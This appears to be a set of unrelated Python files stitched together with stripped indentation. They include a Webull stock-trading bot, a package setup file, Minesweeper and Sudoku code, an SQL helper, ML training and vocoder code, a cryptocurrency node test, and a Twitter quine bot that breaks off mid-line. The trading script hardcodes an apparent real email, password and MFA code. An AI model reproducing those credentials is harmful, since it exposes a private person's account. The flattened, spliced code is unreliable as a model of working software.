import requests #for api considered gold standard for executing http request
import math # math formulas
from scipy.stats import percentileofscore as score # makes it easy to calculate percentile scores
from secrets import IEX_CLOUD_API_TOKEN
import talib
from talib import RSI, BBANDS
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import yahoo_fin.stock_info as yf
# s = sched.scheduler(time.time, time.sleep)
#########
# CHECK IF MARKET IS OPEN
while True:
# check and see if its 7am
now = datetime.now()
day=datetime.today().strftime('%A')
current_time = now.strftime("%H:%M:%S")
print('Today is', day, "Current Time is ", current_time)
if now.hour >= 2:# and now.minute>=30:# and now.hour<=14:# and now.hour<=14:
print('start')
break
else:
time.sleep(300)
###################
# LOG IN
wb = paper_webull()
result = wb.login('svalenzuela8@miners.utep.edu', 'Svelty+Car0+2o16!', device_name='', mfa='836177')
if result:
print("Logged In")
else:
print("get mfa Data")
# get porftolio info
portfolio = wb.get_portfolio()
# print(portfolio['cashBalance'])
# portfolio_size = portfolio['cashBalance']
print(portfolio['usableCash'])
# portfolio_size = portfolio['usableCash']
portfolio_size = 1000
### INITIALIZE
'''
here you want to define your universe
define you strategy parameters
define vareiagle to control trading fequency
schedule functions
'''
# import list of stocks
stocks = pd.read_csv('/home/vrmn/2021/notes/notes_stocks/sp_500_stocks.csv')
# stocks = yf.tickers_nasdaq()
# stocks = yf.tickers_sp500()
# stocks = pd.DataFrame(stocks)
# stocks.rename(columns={0:'Ticker'},inplace=True)
# print(stocks)
# print('')
# print(stocks['Ticker'])
##### EXECUTE A BATCH API CALL AND BUILD A DATAFRAME ################################
def chunks(lst,n):
''' yield succesive n-sized chunks from list '''
for i in range(0 ,len(lst), n):
yield lst[i:i+n]
symbol_groups = list(chunks(stocks['Ticker'],100))
symbol_strings = []
for i in range(0, len(symbol_groups)):
symbol_strings.append(','.join(symbol_groups[i]))
########################## Create your dataset
hqm_columns = [
'Ticker',
'Price',
'Number of Shares to Buy',
'One-Year Price Return',
'One-year Return Percentile',
'Six-Month Price Return',
'Six-Month Return Percentile',
'Three-Month Price Return',
'Three-Month Return Percentile',
'One-Month Price Return',
'One-Month Return Percentile'
]
hqm_dataframe = pd.DataFrame(columns=hqm_columns)
for symbol_string in symbol_strings:
batch_api_call_url = f'https://sandbox.iexapis.com/stable/stock/market/batch?symbols={symbol_string}&types=price,stats&token={IEX_CLOUD_API_TOKEN}'
data = requests.get(batch_api_call_url).json()
for symbol in symbol_string.split(','):
hqm_dataframe = hqm_dataframe.append(
pd.Series(
[symbol,
data[symbol]['price'],
'n/a',
data[symbol]['stats']['year1ChangePercent'],
'n/a',
data[symbol]['stats']['month6ChangePercent'],
'n/a',
data[symbol]['stats']['month3ChangePercent'],
'n/a',
data[symbol]['stats']['month1ChangePercent'],
'n/a',
], index =hqm_columns),
ignore_index = True)
################### CALCULATE MOMENTUM PERCENTILES #########################
time_periods = [
'One-Year',
'Six-Month',
'Three-Month',
'One-Month'
]
hqm_dataframe.fillna(value=0.0, inplace=True)
for row in hqm_dataframe.index:
for time_period in time_periods:
change_col = f'{time_period} Price Return'
percentile_col = f'{time_period} Return Percentile'
a = hqm_dataframe[change_col]
b = hqm_dataframe.loc[row, change_col]
hqm_dataframe.loc[row, percentile_col] = score(a,b)
##################3
from statistics import mean
for row in hqm_dataframe.index:
momentum_percentiles = []
for time_period in time_periods:
momentum_percentiles.append(hqm_dataframe.loc[row, f'{time_period} Return Percentile'])
hqm_dataframe.loc[row,'HQM Score'] = mean(momentum_percentiles)
############# select the 50 best momentum stocks
hqm_dataframe.sort_values('HQM Score', ascending = False, inplace=True)
hqm_dataframe = hqm_dataframe[:5]
hqm_dataframe.reset_index(inplace=True, drop=True)
# print(hqm_dataframe)
##### calcuate the number of shares to buy
position_size = float(portfolio_size)/len(hqm_dataframe.index)
for i in hqm_dataframe.index:
hqm_dataframe.loc[i,'Number of Shares to Buy']=math.floor(position_size/hqm_dataframe.loc[i,'Price'])
print(hqm_dataframe)
# buy the recommended values from hqm_dataframe.index
print('Alright lets start trading')
while now.hour<=14:
dataframes = []
timeframe = 5 #Enter the timeframe in minutes to trade on (e.g. 1,5,15,60) : "
days_back = 2
for symbol in hqm_dataframe.index:
'''
Place an order
price: float (LMT / STP LMT Only)
action: BUY / SELL / SHORT
ordertype : LMT / MKT / STP / STP LMT / STP TRAIL
timeinforce: GTC / DAY / IOC
outsideRegularTradingHour: True / False
stpPrice: float (STP / STP LMT Only)
trial_value: float (STP TRIAL Only)
trial_type: DOLLAR / PERCENTAGE (STP TRIAL Only)
'''
stock = hqm_dataframe['Ticker'][symbol]
quant = hqm_dataframe['Number of Shares to Buy'][symbol]
# print(quant)
var_name = stock+'df'
var_name = wb.get_bars(stock=stock, interval='m5', count=int((390*days_back)/timeframe), extendTrading=1)
dataframes.append((stock,var_name))
# print(dataframes)
# print('')
for tup in dataframes:
stock, df = tup
df['MA20'] = df['close'].rolling(20).mean()
# df['MA50'] = df['close'].rolling(50).mean()
# df['rsi'] = talib.RSI(df["close"])
df['upper'] = df['MA20'] + 2*(df['close'].rolling(20).std())
df['lower'] = df['MA20'] - 2*(df['close'].rolling(20).std())
# df['lowbuf'] = df['lower']*1.03
# df[['close','MA20','upper','lower','lowbuf']].plot(figsize=(16,6))
# plt.show()
#### lol the beginning of a crossover strategy
# if df['MA20'][-1]>df['MA50'][-1]:
# print('kk')
# print(df['lower'][-1]*1.03)
if df['close'][-1] <= df['lower'][-1]:
print(stock)
wb.place_order(stock=stock, action='BUY', orderType='MKT', enforce='DAY', quant=quant)
print('price',yf.get_live_price(stock),'lowerbound',df['lower'][-1])
print('long')
elif df['close'][-1]>= df['upper'][-1]:
print('stock')
wb.place_order(stock=stock, action='SELL', orderType='MKT', enforce='DAY', quant=quant)
print('price',yf.get_live_price(stock),'upperbound',df['upper'][-1])
print('short')
# print(stock)
# print(df.tail())
# print('')
# check if closing time
if now.hour >= 14:
print('All done for today')
break
else:
time.sleep(90)
# for symbol in pos.index:
# '''
# Place an order
# price: float (LMT / STP LMT Only)
# action: BUY / SELL / SHORT
# ordertype : LMT / MKT / STP / STP LMT / STP TRAIL
# timeinforce: GTC / DAY / IOC
# outsideRegularTradingHour: True / False
# stpPrice: float (STP / STP LMT Only)
# trial_value: float (STP TRIAL Only)
# trial_type: DOLLAR / PERCENTAGE (STP TRIAL Only)
# '''
# # stock = hqm_dataframe['Ticker'][symbol]
# # quant = hqm_dataframe['Number of Shares to Buy'][symbol]
# try:
# wb.place_order(stock=stock, action='SELL', orderType='MKT', enforce='DAY', quant=quant)
# def get_current_orders(self):
# def get_positions(self):
# stock,df = dataframes
# print(stock)
# print(quant)
# # stock=None, tId=None, price=0, action='BUY', orderType='LMT', enforce='GTC', quant=0, outsideRegularTradingHour=True, stpPrice=None, trial_value=0, trial_type='DOLLAR')
# wb.cancel_all_orders()
### BEFORE TRADING START
# ### HANDLE DATAT Run this every minute
# ####### RUN STRATEGY
|
from setuptools import setup
try:
import enum # noqa
extra_requires = []
except ImportError:
extra_requires = ['enum34']
REQUIRES = ['marshmallow>=2.0.0'] + extra_requires
with open('README.md', 'r') as f:
readme = f.read()
with open('CHANGELOG', 'r') as f:
changelog = f.read()
if __name__ == '__main__':
setup(
name='marshmallow-enum',
version='1.5.1',
author='Alec Nikolas Reiter',
author_email='alecreiter@gmail.com',
description='Enum field for Marshmallow',
long_description=readme + '\n\n' + changelog,
long_description_content_type="text/markdown",
package_data={'': ['LICENSE', 'README.md', 'CHANGELOG']},
include_package_data=True,
license='MIT',
packages=['marshmallow_enum'],
install_requires=REQUIRES,
)
|
"""Class that defines the Mine Sweeper Game.
Author: Yuhuang Hu
Email : duguyue100@gmail.com
"""
from __future__ import print_function
from msboard import MSBoard
class MSGame(object):
"""Define a Mine Sweeper game."""
def __init__(self, board_width, board_height, num_mines,
port=5678, ip_add="127.0.0.1"):
"""The init function of Mine Sweeper Game.
Parameters
----------
board_width : int
the width of the board (> 0)
board_height : int
the height of the board (> 0)
num_mines : int
the number of mines, cannot be larger than
(board_width x board_height)
port : int
UDP port number, default is 5678
ip_add : string
the ip address for receiving the command,
default is localhost.
"""
if (board_width <= 0):
raise ValueError("the board width cannot be non-positive!")
else:
self.board_width = board_width
if (board_height <= 0):
raise ValueError("the board height cannot be non-positive!")
else:
self.board_height = board_height
if (num_mines >= (board_width*board_height)):
raise ValueError("The number of mines cannot be larger than "
"number of grids!")
else:
self.num_mines = num_mines
self.BUFFER_SIZE = 1024
self.move_types = ["click", "flag", "unflag", "question"]
self.init_new_game()
def init_new_game(self, with_tcp=False):
"""Init a new game.
Parameters
----------
board : MSBoard
define a new board.
game_status : int
define the game status:
0: lose, 1: win, 2: playing
moves : int
how many moves carried out.
"""
self.board = self.create_board(self.board_width, self.board_height,
self.num_mines)
self.game_status = 2
self.num_moves = 0
self.move_history = []
def reset_game(self):
"""Reset game."""
self.init_new_game(with_tcp=False)
def create_board(self, board_width, board_height, num_mines):
"""Create a board by given parameters.
Parameters
----------
board_width : int
the width of the board (> 0)
board_height : int
the height of the board (> 0)
num_mines : int
the number of mines, cannot be larger than
(board_width x board_height)
Returns
-------
board : MSBoard
"""
return MSBoard(board_width, board_height, num_mines)
def check_move(self, move_type, move_x, move_y):
"""Check if a move is valid.
If the move is not valid, then shut the game.
If the move is valid, then setup a dictionary for the game,
and update move counter.
TODO: maybe instead of shut the game, can end the game or turn it into
a valid move?
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
if move_type not in self.move_types:
raise ValueError("This is not a valid move!")
if move_x < 0 or move_x >= self.board_width:
raise ValueError("This is not a valid X position of the move!")
if move_y < 0 or move_y >= self.board_height:
raise ValueError("This is not a valid Y position of the move!")
move_des = {}
move_des["move_type"] = move_type
move_des["move_x"] = move_x
move_des["move_y"] = move_y
self.num_moves += 1
return move_des
def play_move(self, move_type, move_x, move_y):
"""Updat board by a given move.
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
# record the move
if self.game_status == 2:
self.move_history.append(self.check_move(move_type, move_x,
move_y))
else:
self.end_game()
# play the move, update the board
if move_type == "click":
self.board.click_field(move_x, move_y)
elif move_type == "flag":
self.board.flag_field(move_x, move_y)
elif move_type == "unflag":
self.board.unflag_field(move_x, move_y)
elif move_type == "question":
self.board.question_field(move_x, move_y)
# check the status, see if end the game
if self.board.check_board() == 0:
self.game_status = 0 # game loses
self.print_board()
self.end_game()
elif self.board.check_board() == 1:
self.game_status = 1 # game wins
self.print_board()
self.end_game()
elif self.board.check_board() == 2:
self.game_status = 2 # game continues
self.print_board()
def qplay(self, move_type, move_x, move_y):
"""Updat board by a given move.
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
# play the move, update the board
if move_type == "click":
self.board.click_field(move_x, move_y)
elif move_type == "flag":
self.board.flag_field(move_x, move_y)
elif move_type == "unflag":
self.board.unflag_field(move_x, move_y)
elif move_type == "question":
self.board.question_field(move_x, move_y)
self.game_status = self.board.check_board()
return self.game_status
def print_board(self):
"""Print board."""
self.board.print_board()
def get_board(self):
"""Get board message."""
return self.board.board_msg()
def get_info_map(self):
"""Get info map."""
return self.board.info_map
def get_mine_map(self):
"""Get mine map."""
return self.board.mine_map
def end_game(self):
"""Settle the end game.
TODO: some more expections..
"""
if self.game_status == 0:
pass
#print("[MESSAGE] YOU LOSE!")
elif self.game_status == 1:
print("[MESSAGE] YOU WIN!")
def parse_move(self, move_msg):
"""Parse a move from a string.
Parameters
----------
move_msg : string
a valid message should be in:
"[move type]: [X], [Y]"
Returns
-------
"""
# TODO: some condition check
type_idx = move_msg.index(":")
move_type = move_msg[:type_idx]
pos_idx = move_msg.index(",")
move_x = int(move_msg[type_idx+1:pos_idx])
move_y = int(move_msg[pos_idx+1:])
return move_type, move_x, move_y
def play_move_msg(self, move_msg):
"""Another play move function for move message.
Parameters
----------
move_msg : string
a valid message should be in:
"[move type]: [X], [Y]"
"""
move_type, move_x, move_y = self.parse_move(move_msg)
self.play_move(move_type, move_x, move_y)
|
#%%
nboard = \
[[".",".",".",".","5",".",".","1","."],\
[".","4",".","3",".",".",".",".","."],\
[".",".",".",".",".","3",".",".","1"],\
["8",".",".",".",".",".",".","2","."],\
[".",".","2",".","7",".",".",".","."],\
[".","1","5",".",".",".",".",".","."],\
[".",".",".",".",".","2",".",".","."],\
[".","2",".","9",".",".",".",".","."],\
[".",".","4",".",".",".",".",".","."]]
# nboard = [[".",".","4",".",".",".","6","3","."] \
# ,[".",".",".",".",".",".",".",".","."] \
# ,["5",".",".",".",".",".",".","9","."] \
# ,[".",".",".","5","6",".",".",".","."],\
# ["4",".","3",".",".",".",".",".","1"],\
# [".",".",".","7",".",".",".",".","."],\
# [".",".",".","5",".",".",".",".","."],\
# [".",".",".",".",".",".",".",".","."],\
# [".",".",".",".",".",".",".",".","."]]
board = \
[["5","3",".",".","7",".",".",".","."] \
,["6",".",".","1","9","5",".",".","."] \
,[".","9","8",".",".",".",".","6","."] \
,["8",".",".",".","6",".",".",".","3"] \
,["4",".",".","8",".","3",".",".","1"] \
,["7",".",".",".","2",".",".",".","6"] \
,[".","6",".",".",".",".","2","8","."] \
,[".",".",".","4","1","9",".",".","5"] \
,[".",".",".",".","8",".",".","7","9"]]
def checkboard(board):
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == ".":
board[i][j] = 0
else:
board[i][j] = int(board[i][j])
return(checkrows(board) and checkcols(board) and checkgrid(board))
checkboard(nboard)
# %%
def checkline(row):
for i in row:
if i > 0:
if i in row[row.index(i)+1:]:
#print(row,"False")
return False
return True
def checkrows(board):
for i in range(len(board)):
if not checkline(board[i]):
#print("row", board[i])
return False
return True
def checkcols(board):
for j in range(len(board[0])):
if not checkline([board[i][j] for i in range(len(board))]):
#print("col", board[i])
return False
return True
def checkgrid(board):
subgrids = []
for box_i in range(3):
for box_j in range(3):
subgrid = []
for i in range(3):
for j in range(3):
subgrid.append(board[3*box_i + i][3*box_j + j])
subgrids.append(subgrid)
#print(subgrid)
if not checkline(subgrid):
return False
return True
checkgrid(nboard)
# %%
def isValidSudoku(board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# init data
rows = [{} for i in range(9)]
columns = [{} for i in range(9)]
boxes = [{} for i in range(9)]
# validate a board
for i in range(9):
for j in range(9):
num = board[i][j]
if num != '.':
num = int(num)
box_index = (i // 3 ) * 3 + j // 3
# keep the current cell value
rows[i][num] = rows[i].get(num, 0) + 1
columns[j][num] = columns[j].get(num, 0) + 1
boxes[box_index][num] = boxes[box_index].get(num, 0) + 1
# check if this value has been already seen before
if rows[i][num] > 1 or columns[j][num] > 1 or boxes[box_index][num] > 1:
return False
return True
nboard = \
[[".",".",".",".","5",".",".","1","."],\
[".","4",".","3",".",".",".",".","."],\
[".",".",".",".",".","3",".",".","1"],\
["8",".",".",".",".",".",".","2","."],\
[".",".","2",".","7",".",".",".","."],\
[".","1","5",".",".",".",".",".","."],\
[".",".",".",".",".","2",".",".","."],\
[".","2",".","9",".",".",".",".","."],\
[".",".","4",".",".",".",".",".","."]]
print(isValidSudoku(nboard))
# %%
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
"""Helper functions for %%sql modules."""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import str
from past.builtins import basestring
from builtins import object
import shlex
from . import _sql_statement
from . import _utils
# It would be nice to be able to inherit from Python module but AFAICT that is not possible.
# So this just wraps a bunch of static helpers.
class SqlModule(object):
""" A container for SqlStatements defined together and able to reference each other. """
@staticmethod
def _get_sql_args(parser, args=None):
""" Parse a set of %%sql arguments or get the default value of the arguments.
Args:
parser: the argument parser to use.
args: the argument flags. May be a string or a list. If omitted the empty string is used so
we can get the default values for the arguments. These are all used to override the
arg parser. Alternatively args may be a dictionary, in which case it overrides the
default values from the arg parser.
Returns:
A dictionary of argument names and values.
"""
overrides = None
if args is None:
tokens = []
elif isinstance(args, basestring):
command_line = ' '.join(args.split('\n'))
tokens = shlex.split(command_line)
elif isinstance(args, dict):
overrides = args
tokens = []
else:
tokens = args
args = {} if parser is None else vars(parser.parse_args(tokens))
if overrides:
args.update(overrides)
# Don't return any args that are None as we don't want to expand to 'None'
return {arg: value for arg, value in args.items() if value is not None}
@staticmethod
def get_default_query_from_module(module):
""" Given a %%sql module return the default (last) query for the module.
Args:
module: the %%sql module.
Returns:
The default query associated with this module.
"""
return _utils.get_default_query_from_module(module)
@staticmethod
def get_sql_statement_with_environment(item, args=None):
""" Given a SQLStatement, string or module plus command line args or a dictionary,
return a SqlStatement and final dictionary for variable resolution.
Args:
item: a SqlStatement, %%sql module, or string containing a query.
args: a string of command line arguments or a dictionary of values.
Returns:
A SqlStatement for the query or module, plus a dictionary of variable values to use.
"""
if isinstance(item, basestring):
item = _sql_statement.SqlStatement(item)
elif not isinstance(item, _sql_statement.SqlStatement):
item = SqlModule.get_default_query_from_module(item)
if not item:
raise Exception('Expected a SQL statement or module but got %s' % str(item))
env = {}
if item.module:
env.update(item.module.__dict__)
parser = env.get(_utils._SQL_MODULE_ARGPARSE, None)
if parser:
args = SqlModule._get_sql_args(parser, args=args)
else:
args = None
if isinstance(args, dict):
env.update(args)
return item, env
@staticmethod
def expand(sql, args=None):
""" Expand a SqlStatement, query string or SqlModule with a set of arguments.
Args:
sql: a SqlStatement, %%sql module, or string containing a query.
args: a string of command line arguments or a dictionary of values. If a string, it is
passed to the argument parser for the SqlModule associated with the SqlStatement or
SqlModule. If a dictionary, it is used to override any default arguments from the
argument parser. If the sql argument is a string then args must be None or a dictionary
as in this case there is no associated argument parser.
Returns:
The expanded SQL, list of referenced scripts, and list of referenced external tables.
"""
sql, args = SqlModule.get_sql_statement_with_environment(sql, args)
return _sql_statement.SqlStatement.format(sql._sql, args)
|
from __future__ import print_function
import sys, os
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset
def check_ignore_cols_automl(models,names,x,y):
models = sum(models.as_data_frame().values.tolist(),[])
for model in models:
if "StackedEnsemble" in model:
continue
else:
assert set(h2o.get_model(model).params["ignored_columns"]["actual"]) == set(names) - {y} - set(x), \
"ignored columns are not honored for model " + model
def test_columns_not_in_x_and_y_are_ignored():
ds = import_dataset()
#Use same project_name so we add to leaderboard for each run
aml = H2OAutoML(max_models=2, stopping_rounds=3, stopping_tolerance=0.001, project_name="aml1")
print("AutoML with x as a str list, train, valid, and test")
x = ["AGE", "RACE", "DPROS"]
y = ds.target
names = ds.train.names
aml.train(x=x, y=y, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x and y as col indexes, train, valid, and test")
aml.train(x=[2, 3, 4], y=1, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x as a str list, y as a col index, train, valid, and test")
aml.train(x=x, y=1, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x as col indexes, y as a str, train, valid, and test")
aml.train(x=[2,3,4], y=y, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
pu.run_tests([
test_columns_not_in_x_and_y_are_ignored
])
|
"""Universal vocoder"""
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
from torch import Tensor
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence
class Vocoder(nn.Module):
"""Universal vocoding"""
def __init__(
self,
sample_rate,
frames_per_sample,
frames_per_slice,
mel_channels,
conditioning_channels,
embedding_dim,
rnn_channels,
fc_channels,
bits,
hop_length
):
super().__init__()
self.sample_rate = sample_rate
self.frames_per_slice = frames_per_slice
self.pad = (frames_per_sample - frames_per_slice) // 2
self.rnn_channels = rnn_channels
self.quantization_channels = 2 ** bits
self.hop_length = hop_length
self.rnn1 = nn.GRU(
mel_channels, conditioning_channels, num_layers=2, batch_first=True, bidirectional=True
)
self.embedding = nn.Embedding(self.quantization_channels, embedding_dim)
self.rnn2 = nn.GRU(embedding_dim + 2 * conditioning_channels, rnn_channels, batch_first=True)
self.fc1 = nn.Linear(rnn_channels, fc_channels)
self.fc2 = nn.Linear(fc_channels, self.quantization_channels)
def forward(self, wavs, mels):
"""Generate waveform from mel spectrogram with teacher-forcing."""
mel_embs, _ = self.rnn1(mels)
mel_embs = mel_embs.transpose(1, 2)
mel_embs = mel_embs[:, :, self.pad : self.pad + self.frames_per_slice]
conditions = F.interpolate(mel_embs, scale_factor=float(self.hop_length))
conditions = conditions.transpose(1, 2)
wav_embs = self.embedding(wavs)
wav_outs, _ = self.rnn2(torch.cat((wav_embs, conditions), dim=2))
wav_outs = F.relu(self.fc1(wav_outs))
wav_outs = self.fc2(wav_outs)
return wav_outs
@torch.jit.export
def generate(self, mels: List[Tensor]) -> List[Tensor]:
"""Generate waveform from mel spectrogram.
Args:
mels: list of tensor of shape (mel_len, mel_channels)
Returns:
wavs: list of tensor of shape (wav_len)
"""
# mels: List[(mel_len, mel_channels), ...]
batch_size = len(mels)
device = mels[0].device
mel_lens = [len(mel) for mel in mels]
wav_lens = [mel_len * self.hop_length for mel_len in mel_lens]
max_mel_len = max(mel_lens)
max_wav_len = max_mel_len * self.hop_length
pad_mels = pad_sequence(mels, batch_first=True)
pack_mels = pack_padded_sequence(
pad_mels, torch.tensor(mel_lens), batch_first=True, enforce_sorted=False
)
pack_mel_embs, _ = self.rnn1(pack_mels)
mel_embs, _ = pad_packed_sequence(pack_mel_embs, batch_first=True)
# mel_embs: (batch, embedding_dim, max_mel_len)
mel_embs = mel_embs.transpose(1, 2)
# conditions: (batch, embedding_dim, max_wav_len)
conditions = F.interpolate(mel_embs, scale_factor=float(self.hop_length))
# conditions: (batch, max_wav_len, embedding_dim)
conditions = conditions.transpose(1, 2)
hid = torch.zeros(1, batch_size, self.rnn_channels, device=device)
wav = torch.full(
(batch_size,), self.quantization_channels // 2, dtype=torch.long, device=device,
)
wavs = torch.empty(batch_size, max_wav_len, dtype=torch.float, device=device,)
for i, condition in enumerate(tqdm(torch.unbind(conditions, dim=1))):
wav_emb = self.embedding(wav)
wav_rnn_input = torch.cat((wav_emb, condition), dim=1).unsqueeze(1)
_, hid = self.rnn2(wav_rnn_input, hid)
logit = F.relu(self.fc1(hid.squeeze(0)))
logit = self.fc2(logit)
posterior = F.softmax(logit, dim=1)
wav = torch.multinomial(posterior, 1).squeeze(1)
wavs[:, i] = 2 * wav / (self.quantization_channels - 1.0) - 1.0
mu = self.quantization_channels - 1
wavs = torch.true_divide(torch.sign(wavs), mu) * (
(1 + mu) ** torch.abs(wavs) - 1
)
wavs = [
wav[:length] for wav, length in zip(torch.unbind(wavs, dim=0), wav_lens)
]
return wavs
|
#!/usr/bin/env python3
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import ElysiumTestFramework
from test_framework.util import assert_raises_message
class ElysiumPropertyCreationFeeTest(ElysiumTestFramework):
def get_new_address(self, default_balance = 0):
addr = self.nodes[0].getnewaddress()
if default_balance > 0:
self.nodes[0].sendtoaddress(addr, default_balance)
self.nodes[0].generate(1)
self.sync_all()
return addr
def test(self, balance = 1, ecosystem = 1, amount = None, expected_error = None):
addr = self.get_new_address(balance)
operator = self.nodes[0].elysium_sendissuancemanaged
options = [addr, ecosystem, 1, 0, "", "", "Foo", "", ""]
if amount is not None:
operator = self.nodes[0].elysium_sendissuancefixed
options.append(amount)
if expected_error is None:
operator(*options)
self.nodes[0].generate(1)
self.sync_all()
else:
assert_raises_message(
JSONRPCException,
expected_error,
operator,
*options)
def test_insufficient(self, balance = 1, ecosystem = 1, amount = None):
self.test(balance, ecosystem, amount, 'fees may not be sufficient')
def run_test(self):
super().run_test()
creation_fee_start_block = 500
# before creation fee is activated, all properies type should be able to create with low fee.
self.test(ecosystem = 1)
self.test(ecosystem = 1, amount = "10000")
self.test(ecosystem = 2)
self.test(ecosystem = 2, amount = "10000")
# make sure, property creation fee is activated
self.nodes[0].generate(creation_fee_start_block - self.nodes[0].getblockcount())
# after the activation, 100 FIRO is required for creating main ecosystem property
self.test_insufficient(ecosystem = 1)
self.test_insufficient(ecosystem = 1, amount = "10000")
# test ecosystem should be able to create with low fee
self.test(ecosystem = 2)
self.test(ecosystem = 2, amount = "10000")
# creating main ecosystem property with 100 FIRO fee, should success
self.test(balance = 101, ecosystem = 1)
self.test(balance = 101, ecosystem = 1, amount = "10000")
if __name__ == '__main__':
ElysiumPropertyCreationFeeTest().main()
|
import cv2
import numpy as np
from os import listdir
from os.path import isfile, join
screens_path = "/Users/andrewfinke/Library/Application Support/loggercli/screens/"
paths = [join(screens_path, f) for f in listdir(screens_path) if isfile(join(screens_path, f)) and ".png" in f]
combined_image = None
for index, path in enumerate(paths):
image = cv2.imread(path)
if combined_image is None:
combined_image = np.zeros(image.shape)
combined_image += image
print("{} / {}".format(index + 1, len(paths)))
result = combined_image / len(paths)
cv2.imwrite("result.png", result)
|
'''
AUTHOR :li peng cheng
DATE :2021/08/10 21:58
'''
import pandas as pd
import numpy as np
from torch.utils.data import TensorDataset, DataLoader
import torch.optim as optim
import torchtext
import torch
from collections import OrderedDict, Counter
from handle_text import *
from text_att_birnn import text_att_birnn
from gensim.models import Word2Vec
maxlen = 15
batch_size = 128
vocab_size = None
hidden_size = 128
class_num = 17
bidirection = True
embed_size = 50
epochs = 10
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# vocab = pd.read_csv('train_20wan.txt',header=None) #dataframe
# train = Counter(OrderedDict(vocab.values)) #dict
# vocab = torchtext.vocab.Vocab(train) #词典
w2v = Word2Vec.load('./embedding_model/word2vec_model_8iter_sg1.model')
print('model load success')
train = pd.read_csv('fenci.txt', header=None)[0:160000] #训练句子 最长的句子有54个词
print('fenci.txt load success')
# len_distribution = Counter(train.apply(lambda x:len(x.iloc[1].split()),axis=1))
# train_x, train_y = get_sequence(vocab, train) #train_x由np.array组成的列表,train_y是真实类别
# train_x, train_y = get_and_pad_sequence(w2v, train, maxlen) #train_x由np.array组成的列表,train_y是真实类别
train_x, train_y = get_pretrain_pad_seq(w2v.wv.index2word, train, maxlen)#获得索引
train_y = np.array(train_y)
# train_x = pad_sequence(train_x, maxlen)
train_x, train_y, test_x, test_y = split_data(train_x, train_y, 0.8)
#加载训练集和测试集
train_dataset = TensorDataset(torch.LongTensor(train_x), torch.LongTensor(train_y))
test_dataset = TensorDataset(torch.LongTensor(test_x), torch.LongTensor(test_y))
# train_dataset = TensorDataset(torch.FloatTensor(train_x), torch.LongTensor(train_y))
# test_dataset = TensorDataset(torch.FloatTensor(test_x), torch.LongTensor(test_y))
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
pretrain = get_pretrain_embedding() #numpy
model = text_att_birnn(batch_size, embed_size, class_num,
bidirection, hidden_size, maxlen, len(w2v.wv.vocab), device, torch.tensor(pretrain))
model= model.to(device)
optim = optim.Adam(model.parameters(), lr=0.002,weight_decay=0.01)
loss = torch.nn.CrossEntropyLoss(reduction='sum',weight=torch.tensor([1.0,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1]).to(device))
print(model.state_dict())
print('train_x shape:', train_x.shape) #(80000, 15)
print('train_y shape:', train_y.shape) #(80000, 15)
print('test_x shape:', test_x.shape)
print('test_y shape:', test_y.shape)
print('start training....')
for epoch in range(epochs):
model.train()
total_loss = 0
total_acc = 0
b = int(len(train_x) / batch_size)
for iter, (x, y) in enumerate(train_loader):
# print(x,y)
optim.zero_grad()
out = model(x.to(device))
l = loss(out, y.to(device))
l.backward()
optim.step()
total_loss += l.data
acc = caculate_acc(out.cpu().detach().numpy(), y.numpy())
total_acc += acc
if iter % 50 ==0:
print('Epoch %d. iter %d. loss is %f acc is %f' % (epoch, iter, l.data, acc))
print('---------------Epoch %d. total loss is %f, total acc is %f----------------' % (epoch, total_loss, total_acc/b))
test_acc = 0
test_loss = 0
model.eval()
b = len(test_x)
for iter, (x, y) in enumerate(test_loader):
# print(x,y)
out = model(x.to(device))
l = loss(out, y.to(device))
test_loss += l.data
test_acc += caculate_test_acc(out.cpu().detach().numpy(), y.numpy())
print('---------------Test dataset epoch %d. total loss is %f, total acc is %f----------------' % (epoch, test_loss, test_acc/b))
|
#!/bin/python
# python-twitter docs
# https://python-twitter.readthedocs.io/en/latest/twitter.html
# Requires a json configuration file called quine_reply.config like this:
# {
# "api_key": "",
# "api_secret_key": "",
# "access_token": "",
# "access_token_secret": ""
# }
import twitter
import datetime
import random
import json
check_text = '#@quinetwt\nimport twitter as T;x=\'chr(35)+"@quinetwt"+chr(10)+"import twitter as T;x="+chr(39)+x+chr(39)+";T.Api('
